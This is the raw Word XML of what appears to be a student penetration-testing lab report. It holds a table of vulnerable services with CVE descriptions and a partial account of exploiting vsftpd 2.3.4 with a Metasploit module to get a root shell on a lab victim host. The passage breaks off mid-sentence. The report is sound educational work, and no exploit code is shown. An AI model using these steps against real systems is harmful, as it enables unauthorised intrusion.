            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>options::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>noident</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unspecified vectors.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="024B7F02" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2554109F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="6A26D404" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1057" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="367716D2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1241" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="11B351A1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="274F5113" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5701" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28E61999" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E70D84D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>extensions, mishandles the handshake phase and mishandles use of sequence numbers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="68DD7030" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1057" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6EA099AF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1241" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2234AE8F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A1971A6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>telnetd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5701" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D29D502" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>telnetd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> poses significant security risks due to multiple known vulnerabilities, including risks of remote code execution, denial of service, authentication bypass, and buffer overflows. It's highly advisable to either disable or replace telnet with more secure alternatives such as SSH. If telnet must be used, ensuring it's properly configured and regularly updated with security patches is essential to mitigate these risks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="459DB52F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1057" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1225BFB3" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1241" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D37FCD6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>netbios-ssn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77EB6A2A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>smbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3.X - 4.X (workgroup: WORKGROUP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5701" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D54D7F4" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Allows remote attackers to bypass intended file-access restrictions via a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>symlink</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> that points outside of a share. As part of the Spotlight protocol, Samba discloses the server-side absolute path of shares, files, and directories in the results for search queries.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AED6782" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60A8C516" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Despite, there are only 3 CVE and no more information, in my opinion, port 139 and port 445, I mean those vulnerabilities are almost the same.  So, the description of 455 port also relate to 139 port service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E3C9DE5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06824185" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability [First]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E18514D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F3C37A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="439EE441" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc258656092"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Services:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A76FA6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F730B92" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Your result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8FB8D5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B28039" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11EDD111" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40E03954" wp14:editId="750431DD">
            <wp:extent cx="6120130" cy="3012440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2"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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3012440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7A4227" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CF9F022" wp14:editId="5B7E2423">
            <wp:extent cx="6120130" cy="4323715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Image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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="4323715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C48CF39" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9450" w:type="dxa"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="2" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2953"/>
        <w:gridCol w:w="6497"/>
      </w:tblGrid>
      <w:tr w:rsidR="00970F89" w14:paraId="7401D0D4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="20429DB1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Action performed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36A85CED" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Output (services, ports)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="64FBD25E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04B541F7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Initially, I search the modules, then chose the excellent one and used this module. After, I checked the options and saw the port was the same with my service, in RHOST we have required option, but there is nothing and I wrote the RHOST of our victim. Then, I run the exploit and saw Command shell session 1 opened (10.0.2.15:40547 -&gt; 192.168.1.85:6200) at 2024-05-16 12:33:55 -0400, so I can get the access with root privilege, as, I wrote the command “id” and got </w:t>
            </w:r>
